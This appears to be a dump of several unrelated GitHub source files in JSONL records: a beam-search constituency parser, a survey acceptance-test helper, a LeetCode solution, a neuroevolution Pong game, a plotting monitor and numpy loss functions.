action\n","repo_name":"oxigensalud/odoo-addons","sub_path":"oxigen_repair/models/product_product.py","file_name":"product_product.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"5644295379","text":"#! /usr/bin/env python\nfrom SparseWeightVector import SparseWeightVector\n\n\"\"\"\nTransition based const. parser (includes tagging)\nScored with beam search and perceptron.\n\"\"\"\n\nclass ConsTree:\n\n def __init__(self,label,children=None):\n self.label = label\n self.children = [] if children is None else children\n\n def is_leaf(self):\n return self.children == []\n \n def add_child(self,child_node):\n self.children.append(child_node)\n \n def arity(self):\n return len(self.children)\n \n def get_child(self,idx=0):\n \"\"\"\n returns the ith child of this node\n \"\"\"\n return self.children[idx]\n\n def __str__(self):\n \"\"\"\n pretty prints the tree\n \"\"\"\n return self.label if self.is_leaf() else '(%s %s)'%(self.label,' '.join([str(child) for child in self.children]))\n\n def tokens(self,labels=True):\n \"\"\"\n @param labels: returns a list of strings if true else returns\n a list of ConsTree objects\n @return the list of words at the leaves of the tree\n \"\"\"\n if self.is_leaf():\n return [self.label] if labels else [self]\n else:\n result = []\n for child in self.children:\n result.extend(child.tokens(labels))\n return result\n \n def index_leaves(self):\n \"\"\"\n Adds an numeric index to each leaf node\n \"\"\"\n for idx,elt in enumerate(self.tokens(labels=False)):\n elt.idx = idx\n \n def triples(self):\n \"\"\"\n Extracts a list of evalb triples from the tree\n (supposes leaves are indexed)\n \"\"\"\n if self.is_leaf():\n return [(self.idx,self.idx+1,self.label)]\n else:\n subtriples = []\n for child in self.children:\n subtriples.extend(child.triples())\n leftidx = min([idx for idx,jdx,label in subtriples])\n rightidx = max([jdx for idx,jdx,label in subtriples])\n subtriples.append((leftidx,rightidx,self.label))\n return subtriples\n\n def compare(self,other):\n \"\"\"\n Compares this tree to another and computes precision,recall,\n fscore. Assumes self is the reference tree\n @param other: the predicted tree\n @return (precision,recall,fscore)\n \"\"\"\n self.index_leaves()\n other.index_leaves()\n ref_triples = set(self.triples())\n pred_triples = set(other.triples())\n intersect = ref_triples.intersection(pred_triples)\n isize = len(intersect)\n P = isize/len(pred_triples)\n R = isize/len(ref_triples)\n F = (2*P*R)/(P+R)\n return (P,R,F)\n\n \n def close_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) unary closure of unary branches\n \"\"\"\n if self.arity() == 1:\n current = self\n unary_labels = []\n while current.arity() == 1 and not current.get_child().is_leaf():\n unary_labels.append(current.label)\n current = current.get_child()\n unary_labels.append(current.label)\n self.label = dummy_annotation.join(unary_labels)\n self.children = current.children\n \n for child in self.children:\n child.close_unaries()\n\n def expand_unaries(self,dummy_annotation='$'):\n \"\"\"\n In place (destructive) expansion of unary symbols.\n \"\"\"\n if dummy_annotation in self.label:\n unary_chain = self.label.split(dummy_annotation)\n self.label = unary_chain[0]\n backup = self.children\n current = self\n for label in unary_chain[1:]:\n c = ConsTree(label)\n current.children = [c] \n current = c\n current.children = backup\n \n for child in self.children:\n child.expand_unaries()\n\n \n def left_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) left markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n left_sequence = self.children[:-1]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, left_sequence)\n self.children = [dummy_tree,self.children[-1]]\n for child in self.children:\n child.left_markovize()\n\n def right_markovize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) right markovization (order 0)\n \"\"\"\n if len(self.children) > 2:\n right_sequence = self.children[1:]\n dummy_label = self.label if self.label[-1] == dummy_annotation else self.label+dummy_annotation\n dummy_tree = ConsTree(dummy_label, right_sequence)\n self.children = [self.children[0],dummy_tree]\n for child in self.children:\n child.right_markovize()\n\n def unbinarize(self,dummy_annotation=':'):\n \"\"\"\n In place (destructive) unbinarization\n \"\"\"\n newchildren = []\n for child in self.children:\n if child.label[-1] == dummy_annotation:\n child.unbinarize()\n newchildren.extend(child.children)\n else:\n child.unbinarize()\n newchildren.append(child)\n self.children = newchildren\n\n def collect_nonterminals(self):\n \"\"\"\n Returns the list of nonterminals found in a tree:\n \"\"\"\n if not self.is_leaf():\n result = [self.label]\n for child in self.children:\n result.extend(child.collect_nonterminals())\n return result\n return []\n\n @staticmethod\n def read_tree(input_str):\n \"\"\"\n Reads a one line s-expression.\n This is a non robust function to syntax errors\n @param input_str: a s-expr string\n @return a ConsTree object\n \"\"\"\n tokens = input_str.replace('(',' ( ').replace(')',' ) ').split()\n stack = [ConsTree('dummy')]\n for idx,tok in enumerate(tokens):\n if tok == '(':\n current = ConsTree(tokens[idx+1])\n stack[-1].add_child(current)\n stack.append(current)\n elif tok == ')':\n stack.pop()\n else:\n if tokens[idx-1] != '(':\n stack[-1].add_child(ConsTree(tok))\n assert(len(stack) == 1)\n return stack[-1].get_child()\n\n\nclass ConstituentTransitionParser:\n\n SHIFT = \"S\"\n REDUCE = \"R\"\n STOP = \"!\"\n \n def __init__(self):\n self.model = SparseWeightVector()\n self.nonterminals = []\n\n def static_oracle(self,stack,buffer,ref_triples):\n \"\"\"\n Returns the action to do given a configuration and a ref parse tree\n @param ref_triples : the triples from the reference tree\n @param stack: the config stack\n @param buffer: a list of integers\n @return a couple (parse action, action param)\n \"\"\"\n if len(stack) >= 2:\n (i,k,X1),(k,j,X2) = stack[-2],stack[-1]\n for X in self.nonterminals:\n if (i,j,X) in ref_triples:\n return (ConstituentTransitionParser.REDUCE,X)\n if buffer:\n idx = buffer[0]\n for tag in self.nonterminals:\n if(idx,idx+1,tag) in ref_triples:\n return (ConstituentTransitionParser.SHIFT,tag)\n return (ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP)\n\n \n def reference_derivation(self,ref_tree):\n \"\"\"\n Returns a reference derivation given a reference tree\n @param ref_tree: a ConsTree\n \"\"\"\n ref_tree.index_leaves()\n ref_triples = set(ref_tree.triples())\n sentence = ref_tree.tokens()\n N = len(sentence)\n\n action = (None,None)\n c = (tuple(),tuple(range(N)),0.0)\n derivation = [(action,c)]\n \n for t in range(2*N):#because 2N-1+terminate\n S,B,score = c\n action,param = self.static_oracle(S,B,ref_triples)\n if action == ConstituentTransitionParser.REDUCE:\n c = self.reduce(c,param,sentence)\n elif action == ConstituentTransitionParser.SHIFT:\n c = self.shift(c,param,sentence)\n else:\n c = self.terminate(c,sentence)\n derivation.append(((action,param),c))\n return derivation\n\n\n def build_tree(self,derivation,sentence):\n \"\"\"\n Builds a ConsTree from a parse derivation\n @param derivation: a parse derivation\n @param sentence: a list of tokens\n @return a ConsTree\n \"\"\"\n tree_stack = [ ]\n for (action,param) , C in derivation:\n S,B,score = C \n if action == ConstituentTransitionParser.SHIFT:\n i,j,lbl = S[-1]\n tag_node = ConsTree(param)\n leaf_node = ConsTree(sentence[i])\n tag_node.add_child(leaf_node)\n tree_stack.append(tag_node)\n elif action == ConstituentTransitionParser.REDUCE:\n root_node = ConsTree(param)\n rnode = tree_stack.pop()\n lnode = tree_stack.pop()\n root_node.children = [lnode,rnode]\n tree_stack.append(root_node)\n return tree_stack[-1]\n \n def reduce(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n i,k,_ = S[-2]\n k,j,_ = S[-1]\n return (S[:-2]+((i,j,param),),B,score+self.score(C,(ConstituentTransitionParser.REDUCE,param),sentence))\n \n def shift(self,C,param,sentence):\n \"\"\"\n Performs a reduction from the current configuration and returns the result\n @param S: a stack\n @param B: a buffer\n @param param: the category for reduction\n @return a configuration\n \"\"\"\n S,B,score = C\n idx = S[-1][1] if S else 0\n return (S+((idx,idx+1,param),),B[1:],score+self.score(C,(ConstituentTransitionParser.SHIFT,param),sentence))\n \n def terminate(self,C,sentence):\n \"\"\"\n Performs a stop action returns the result\n \"\"\"\n S,B,score = C\n return (S,B,score+self.score(C,(ConstituentTransitionParser.STOP,ConstituentTransitionParser.STOP),sentence))\n \n\n def score(self,configuration,action,tokens):\n \"\"\"\n Computes the prefix score of a derivation\n @param configuration : a triple (S,B,score)\n @param action: an action label \n @param tokens: the x-sequence of tokens to be parsed\n @return a prefix score\n \"\"\"\n S,B,old_score = configuration\n config_repr = self.__make_config_representation(S,B,tokens)\n return old_score + self.model.dot(config_repr,action)\n\n def __make_config_representation(self,S,B,tokens):\n \"\"\"\n This gathers the information for coding the configuration as a feature vector.\n @param S: a configuration stack\n @param B a configuration buffer\n @return an ordered list of tuples \n \"\"\"\n #default values for inaccessible positions\n s0cat,s1cat,s0l,s0r,s1l,s1r,b0,b1,b2 = \"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\",\"_UNDEF_\"\n \n if len(S) > 0:\n i,j,lbl = S[-1]\n s0l,s0r,s0cat = tokens[i],tokens[j-1],lbl\n if len(S) > 1:\n i,j,lbl = S[-2]\n s1l,s1r,s1cat = tokens[i],tokens[j-1],lbl\n if len(B) > 0:\n b0 = tokens[B[0]]\n if len(B) > 1:\n b1 = tokens[B[1]]\n if len(B) > 2:\n b2 = tokens[B[2]]\n\n wordlist = [s0l,s0r,s1l,s1r,b0,b1,b2]\n catlist = [s0cat,s1cat,b0]\n word_bigrams = list(zip(wordlist,wordlist[1:]))\n word_trigrams = list(zip(wordlist,wordlist[1:],wordlist[2:]))\n cat_bigrams = list(zip(catlist,catlist[1:]))\n \n return word_bigrams + word_trigrams + cat_bigrams\n\n\n def transform(self,dataset,left_markov = True):\n \"\"\"\n In place (destructive) conversion of a treebank to Chomsky Normal Form.\n Builds the list of the parser nonterminals as a side effect\n and indexes references trees.\n \n @param dataset a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n all_nonterminals = set()\n for tree in dataset:\n tree.close_unaries()\n if left_markov:\n tree.left_markovize()\n else:\n tree.right_markovize()\n all_nonterminals.update(tree.collect_nonterminals()) \n self.nonterminals = list(all_nonterminals)\n \n def parse_one(self,sentence,beam_size=4,get_beam=False,deriv=False,untransform=True):\n \"\"\"\n @param sentence: a list of strings\n @param beam_size: size of the beam\n @param get_beam : returns the beam instead of tree like structures\n @param deriv: returns the derivation instead of the parse tree\n @param untransform: bool if true unbinarizes the resulting tree.\n \"\"\"\n \n actions = [ConstituentTransitionParser.SHIFT,\\\n ConstituentTransitionParser.REDUCE,\\\n ConstituentTransitionParser.STOP]\n all_actions = list([(a,p) for a in actions for p in self.nonterminals])\n \n N = len(sentence)\n init = (tuple(),tuple(range(N)),0.0) #A config is a hashable triple with score \n current_beam = [(-1,(None,None),init)]\n beam = [current_beam]\n \n for i in range(2*N): #because 2*N-1+terminate\n next_beam = []\n for idx, ( _ ,action,config) in enumerate(current_beam):\n S,B,score = config \n for (a,p) in all_actions:\n if a == ConstituentTransitionParser.SHIFT:\n if B:\n newconfig = self.shift(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.REDUCE:\n if len(S) >= 2:\n newconfig = self.reduce(config,p,sentence)\n next_beam.append((idx,(a,p),newconfig))\n elif a == ConstituentTransitionParser.STOP:\n if len(S) < 2 and not B:\n newconfig = self.terminate(config,sentence)\n next_beam.append((idx,(a,a),newconfig))\n next_beam.sort(key=lambda x:x[2][2],reverse=True)\n next_beam = next_beam[:beam_size]\n beam.append(next_beam)\n current_beam = next_beam\n \n if get_beam:\n return beam\n else:\n #Backtrace for derivation\n idx = 1\n prev_jdx = 0\n derivation = []\n while prev_jdx != -1:\n current = beam[-idx][prev_jdx]\n prev_jdx,prev_action,C = current\n derivation.append((prev_action,C))\n idx += 1\n derivation.reverse()\n if deriv:\n return derivation\n else:\n result = self.build_tree(derivation,sentence)\n if untransform:\n result.unbinarize()\n result.expand_unaries()\n return result\n\n def early_prefix(self,ref_parse,beam):\n \"\"\"\n Finds the prefix for early update, that is the prefix where the ref parse fall off the beam.\n @param ref_parse: a parse derivation\n @param beam: a beam output by the parse_one function\n @return (bool, ref parse prefix, best in beam prefix)\n the bool is True if update required false otherwise\n \"\"\"\n idx = 0\n for (actionR,configR),(beamCol) in zip(ref_parse,beam):\n found = False\n for source_idx,action,configTarget in beamCol:\n if action == actionR and configTarget[:-1] == configR[:-1]: #-1 -> does not test score equality\n found = True\n break\n if not found:\n #backtrace\n jdx = idx\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config))\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True, ref_parse[:idx+1],early_prefix)\n idx+=1\n #if no error found check that the best in beam is the ref parse\n last_ref_action,last_ref_config = ref_parse[-1]\n _,last_pred_action,last_pred_config = beam[-1][0]\n if last_pred_config[:-1] == last_ref_config[:-1]:\n return (False,None,None) #returns a no update message\n else:#backtrace\n jdx = len(beam)-1\n source_idx = 0\n early_prefix = []\n while jdx >= 0:\n new_source_idx,action,config = beam[jdx][source_idx]\n early_prefix.append( (action,config) )\n source_idx = new_source_idx\n jdx -= 1\n early_prefix.reverse()\n return (True,ref_parse,early_prefix)\n \n\n def test(self,treebank,beam_size=4):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n @return the avg f-score\n \"\"\"\n Fscores = []\n for tree in treebank:\n result = self. parse_one(tree.tokens(),beam_size)\n print(result)\n P,R,F = tree.compare(result)\n Fscores.append(F)\n return sum(Fscores)/len(Fscores)\n \n def train(self,treebank,step_size=1.0,max_epochs=100,beam_size=4,left_markov=True):\n \"\"\" \n @param treebank a list of ConsTrees\n @param left_markov: if true -> left markovization else right markovization\n \"\"\"\n self.transform(treebank,left_markov)\n dataset = list([(tree.tokens(),self.reference_derivation(tree)) for tree in treebank])\n N = len(dataset)\n for e in range(max_epochs):\n loss = 0.0\n for sentence,ref_derivation in dataset:\n pred_beam = (self.parse_one(sentence,get_beam=True))\n (update, ref_prefix,pred_prefix) = self.early_prefix(ref_derivation,pred_beam)\n if update:\n loss += 1.0\n delta_ref = SparseWeightVector()\n current_config = ref_prefix[0][1]\n for action,config in ref_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_ref += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n \n delta_pred = SparseWeightVector()\n current_config = pred_prefix[0][1]\n for action,config in pred_prefix[1:]:\n S,B,score = current_config\n x_repr = self.__make_config_representation(S,B,sentence)\n delta_pred += SparseWeightVector.code_phi(x_repr,action)\n current_config = config\n\n self.model += step_size*(delta_ref-delta_pred)\n \n print('Loss = ',loss, \"%Exact match = \",(N-loss)/N)\n if loss == 0.0:\n return\n\n \n \nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\nparser = ConstituentTransitionParser()\nparser.train([x,y,z])\n\nx = ConsTree.read_tree('(S (NP (D le) (N chat)) (VN (V mange)) (NP (D la) (N souris)) (PP (P sur) (NP (D le) (N paillasson))) (PONCT .))')\ny = ConsTree.read_tree('(S (NP (D la) (N souris)) (VN (V dort)) (PONCT .))')\nz = ConsTree.read_tree('(S (NP (D le) (N cuisinier)) (VN (V mange)) (NP (D une) (N salade) (PP (P avec) (NP (D des) (N cornichons)))) (PONCT .))')\n\n\nprint(parser.test([x,y,z]))\n","repo_name":"bencrabbe/parsing-at-diderot","sub_path":"const_transition.py","file_name":"const_transition.py","file_ext":"py","file_size_in_byte":21088,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"35485078512","text":"from datetime import datetime\nfrom functools import partial\nfrom typing import Mapping\n\nimport requests\n\nfrom acceptance_tests.utilities.pubsub_helper import get_matching_pubsub_message_acking_others\nfrom acceptance_tests.utilities.test_case_helper import test_helper\nfrom config import Config\n\n\ndef add_survey(sample_validation_rules, test_start_time, sample_definition_url=\"http://foo.bar.json\",\n sample_has_header_row=True, sample_file_separator=','):\n survey_name = 'test survey ' + datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n\n url = f'{Config.SUPPORT_TOOL_API}/surveys'\n\n body = {\"name\": survey_name,\n \"sampleValidationRules\": sample_validation_rules,\n \"sampleWithHeaderRow\": sample_has_header_row,\n \"sampleSeparator\": sample_file_separator,\n \"sampleDefinitionUrl\": sample_definition_url,\n \"metadata\": {'foo': 'bar'}}\n\n response = requests.post(url, json=body)\n response.raise_for_status()\n\n survey_id = response.json()\n\n survey_update_event = get_emitted_survey_update(survey_name, test_start_time)\n test_helper.assertEqual(survey_update_event['name'], survey_name,\n 'Unexpected survey name')\n\n test_helper.assertEqual(survey_update_event['sampleDefinitionUrl'], sample_definition_url,\n 'Unexpected sample definition URL')\n\n test_helper.assertEqual(survey_update_event['metadata'], {'foo': 'bar'},\n 'Unexpected metadata')\n\n return survey_id\n\n\ndef get_emitted_survey_update(expected_survey_name, test_start_time):\n # Build the matcher with the current expected survey name\n survey_name_matcher = partial(_survey_name_message_matcher, expected_survey_name=expected_survey_name)\n\n message_received = get_matching_pubsub_message_acking_others(Config.PUBSUB_OUTBOUND_SURVEY_SUBSCRIPTION,\n survey_name_matcher, test_start_time)\n\n return message_received['payload']['surveyUpdate']\n\n\ndef _survey_name_message_matcher(message: Mapping, expected_survey_name=None) -> (bool, str):\n if message['payload']['surveyUpdate']['name'] == expected_survey_name:\n return True, ''\n return False, f'Actual survey name \"{message[\"payload\"][\"surveyUpdate\"][\"name\"]}\" ' \\\n f'does not match expected \"{expected_survey_name}\"'\n","repo_name":"ONSdigital/ssdc-rm-acceptance-tests","sub_path":"acceptance_tests/utilities/survey_helper.py","file_name":"survey_helper.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22473868624","text":"import unittest\n\ndata = ((\"aA\", \"aAAbbbb\", 3), (\"z\", \"ZZ\", 0))\n\n\nclass Solution:\n def numJewelsInStones(self, jewels: str, stones: str) -> int:\n jewels_set = set(jewels)\n jewels_count = 0\n for s in stones:\n if s in jewels_set:\n jewels_count += 1\n return jewels_count\n\n\nclass TestCase(unittest.TestCase):\n def test_solution(self):\n s = Solution()\n\n for jewels, stones, expected in data:\n self.assertEqual(s.numJewelsInStones(jewels, stones), expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"cybernextgen/leetcode","sub_path":"easy/771-jewels-and-stones.py","file_name":"771-jewels-and-stones.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28147215907","text":"import numpy.random as nprand\nimport pygame\nfrom ball import Ball\nfrom paddle import Paddle\n\nclass Pong:\n def __init__(self):\n pygame.init()\n self.font = pygame.font.SysFont('Comic Sans MS', 30)\n self.screen = pygame.display.set_mode([1820, 980])\n self.screenWidth = self.screen.get_width()\n self.screenHeight = self.screen.get_height()\n\n self.simSpeed = 3\n\n self.population = []\n self.balls = []\n self.previousPopulation = []\n self.populationSize = 256\n self.averageFitnessHistory = []\n self.maximumScoreHistory = []\n self.maximumHitsHistory = []\n\n self.createPopulation()\n self.createBalls()\n self.generation = 1\n\n self.running = True\n self.drawAll = True\n self.gameLoop()\n pass\n\n def createPopulation(self):\n for i in range(self.populationSize):\n paddle = Paddle(self.screen)\n self.population.append(paddle)\n return self.population\n\n def createBalls(self):\n for i in range(self.populationSize):\n ball = Ball(self.screen, self.simSpeed)\n self.balls.append(ball)\n return self.balls\n\n def evaluateFitness(self):\n sumScore = 0\n sumHits = 0\n for paddle in self.previousPopulation:\n sumScore += paddle.timeUnderBall\n sumHits += paddle.ballHits\n for paddle in self.previousPopulation:\n paddle.fitness = ((paddle.timeUnderBall * paddle.ballHits) + (15000 / paddle.distanceFromBall)) ** 2\n pass\n\n def calculateStatistics(self):\n totalFitness = 0\n maximumScore = 0\n maximumHits = 0\n for paddle in self.previousPopulation:\n if paddle.timeUnderBall > maximumScore:\n maximumScore = paddle.timeUnderBall\n if paddle.ballHits > maximumHits:\n maximumHits = paddle.ballHits\n totalFitness += paddle.fitness\n self.averageFitnessHistory.append(totalFitness/len(self.previousPopulation))\n self.maximumScoreHistory.append(maximumScore)\n self.maximumHitsHistory.append(maximumHits)\n pass \n\n #build the next generation\n def nextGeneration(self):\n self.evaluateFitness()\n self.calculateStatistics()\n for i in range(self.populationSize):\n parent1 = self.selectRandomBiasedParent()\n parent2 = self.selectRandomBiasedParent()\n child = self.crossover(parent1, parent2, 1)\n \n # parent1 = self.selectFittestParent()\n # child = self.crossover(parent1, parent1, 1)\n if nprand.random() < 0.75:\n child.brain.mutate(0.1)\n self.population.append(child)\n self.createBalls()\n print(\"Average Fitness: \", self.averageFitnessHistory[-5:])\n print(\"Maximum Score: \", self.maximumScoreHistory[-5:])\n print(\"Maximum Hits: \", self.maximumHitsHistory[-5:])\n\n\n def selectRandomBiasedParent(self, k=3):\n\t# first random selection\n index = nprand.randint(len(self.previousPopulation))\n for i in nprand.randint(0, len(self.previousPopulation), k-1):\n # check if better (e.g. perform a tournament)\n if self.previousPopulation[i].fitness > self.previousPopulation[index].fitness:\n index = i\n return self.previousPopulation[index]\n\n def selectFittestParent(self):\n maxFitness = 0\n fittestPaddle = self.previousPopulation[0]\n for paddle in self.previousPopulation:\n if paddle.fitness > maxFitness:\n maxFitness = paddle.fitness\n fittestPaddle = paddle\n return fittestPaddle\n\n def crossover(self, parent1, parent2, crossoverRate):\n child = Paddle(self.screen)\n for layer in range(len(child.brain.layers)):\n for row in range(len(child.brain.layers[layer].weights)):\n for weight in range(len(child.brain.layers[layer].weights[row])):\n if nprand.random() < crossoverRate:\n child.brain.layers[layer].weights[row][weight] = parent1.brain.layers[layer].weights[row][weight]\n else:\n child.brain.layers[layer].weights[row][weight] = parent2.brain.layers[layer].weights[row][weight]\n return child\n\n def update(self):\n if len(self.population) <= 0:\n self.nextGeneration()\n self.generation += 1\n self.previousPopulation = []\n print(\"Generation: \", self.generation)\n else:\n toRemove = []\n for i in range(len(self.population)):\n paddle = self.population[i]\n ball = self.balls[i]\n if not ball.checkBallPos():\n self.previousPopulation.append(paddle)\n paddle.distanceFromBall = abs(ball.xPos - paddle.pos)\n toRemove.append(i)\n ball.updatePosition()\n paddle.collisionCheck(ball)\n prediction = paddle.think([[paddle.pos / self.screenWidth],[ball.xPos / self.screenWidth],[ball.yPos / self.screenHeight], [ball.xVel], [ball.yVel]])\n if prediction == 0:\n paddle.move(1)\n elif prediction == 2:\n paddle.move(-1)\n pass\n self.population = [paddle for paddle in self.population if self.population.index(paddle) not in toRemove]\n self.balls = [ball for ball in self.balls if self.balls.index(ball) not in toRemove]\n \n\n def draw(self):\n self.screen.fill((255,255,255))\n if (self.drawAll):\n for i in range(len(self.population)):\n self.population[i].draw()\n self.balls[i].draw()\n else:\n self.population[-1].draw()\n self.balls[-1].draw()\n pass\n\n def gameLoop(self):\n while self.running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_2:\n self.simSpeed = 5 if self.simSpeed >= 4.5 else self.simSpeed + 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n pass\n if event.key == pygame.K_1:\n self.simSpeed = 0 if self.simSpeed <= 0.5 else self.simSpeed - 0.5\n print(self.simSpeed)\n for paddle in self.population:\n paddle.speed = self.simSpeed\n for ball in self.balls:\n ball.speed = self.simSpeed\n if event.key == pygame.K_r:\n for ball in self.balls:\n self.balls = []\n for paddle in self.population:\n paddle.distanceFromBall = 500\n self.previousPopulation.append(paddle)\n self.population = []\n\n self.update()\n if (len(self.population) > 0):\n if (self.generation % 1 == 0):\n self.draw()\n pygame.display.flip()\n \n\n\ngame = Pong()","repo_name":"frankpeckover/pong","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":7582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34969470073","text":"import mubeaSlipSimulator as ms\nfrom datetime import datetime\nimport os\nimport plotext as plt\n\n\ndef monitorRuns(runs: int, d: ms.MeasurementStore, refresh_ms: int):\n labels = []\n velocities_f = []\n velocities_r = []\n delta = []\n\n values = d.getLast(runs)\n for v in values:\n id, data = v\n labels.append(datetime.strptime(data.get('date'), \"%Y-%m-%d %H:%M:%S.%f\"))\n velocities_f.append(float(data.get('velocity_f')))\n velocities_r.append(float(data.get('velocity_r')))\n\n d = float(data.get('velocity_f')) - float(data.get('velocity_r'))\n delta.append(d)\n\n title = 'Last Runs'\n os.system('cls' if os.name == 'nt' else 'clear')\n plt.clt()\n plt.clf()\n\n dates = plt.datetimes_to_string(labels)\n\n # Set the color of each line based on the velocity_f and velocity_r values\n line_color = \"red\" if velocities_f[-1] < velocities_r[-1] else \"blue\"\n plt.plot(delta, label=\"delta\", yside=\"right\", fillx=True, color=\"gray\")\n plt.plot(velocities_f, label=\"f\", yside=\"left\", color=line_color)\n plt.plot(velocities_r, label=\"r\", yside=\"left\", color=line_color)\n\n plt.interactive(True)\n plt.show()\n\n time.sleep(refresh_ms/1000)\n","repo_name":"Keijukainen311/SlipDetection","sub_path":"monitorTerminal.py","file_name":"monitorTerminal.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73521211529","text":"try:\r\n import cupy as np\r\n is_cupy_available = True\r\nexcept:\r\n import numpy as np\r\n is_cupy_available = False\r\n\r\nfrom diffusion.activations import Sigmoid, Softmax, ReLU, LogSoftmax\r\n\r\n\r\nclass MSE():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.power(t - y, 2)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -2 * (t - y) / np.prod(np.asarray(y.shape[1:]))\r\n\r\n\r\nclass BinaryCrossEntropy():\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -(t * np.log(y + 1e-8) + (1 - t) * np.log(1 - y + 1e-8))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return -t / (y + 1e-8) + (1 - t) / (1 - (y + 1e-8))\r\n\r\n\r\nclass CategoricalCrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, - t * np.log(y))\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n return np.where(t == self.ignore_index, 0, -t / y)\r\n\r\n\r\nclass CrossEntropy():\r\n def __init__(self, ignore_index = None) -> None:\r\n self.ignore_index = ignore_index\r\n self.log_softmax = LogSoftmax()\r\n\r\n def loss(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n log_softmax = self.log_softmax.forward(y)\r\n nll_loss = -log_softmax[np.arange(len(t)), t]\r\n \r\n return np.where(t == self.ignore_index, 0, nll_loss)\r\n\r\n def derivative(self, y, t):\r\n y = np.asarray(y)\r\n t = np.asarray(t)\r\n batch_size = y.shape[0]\r\n err = 1/batch_size\r\n nll_loss_der = -1 * np.where(np.isin(y, y[np.arange(len(t)), t]), err, 0).astype(y.dtype)\r\n \r\n output_err = self.log_softmax.jacobian_backward(nll_loss_der)\r\n \r\n return np.where(t.reshape(-1, 1) == self.ignore_index, 0, output_err)\r\n\r\n\r\n\r\n\r\n\r\n\r\nloss_functions = {\r\n \r\n \"mse\": MSE(),\r\n \"binary_crossentropy\": BinaryCrossEntropy(),\r\n \"categorical_crossentropy\": CategoricalCrossEntropy()\r\n\r\n}","repo_name":"AkiRusProd/numpy-diffusion","sub_path":"diffusion/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
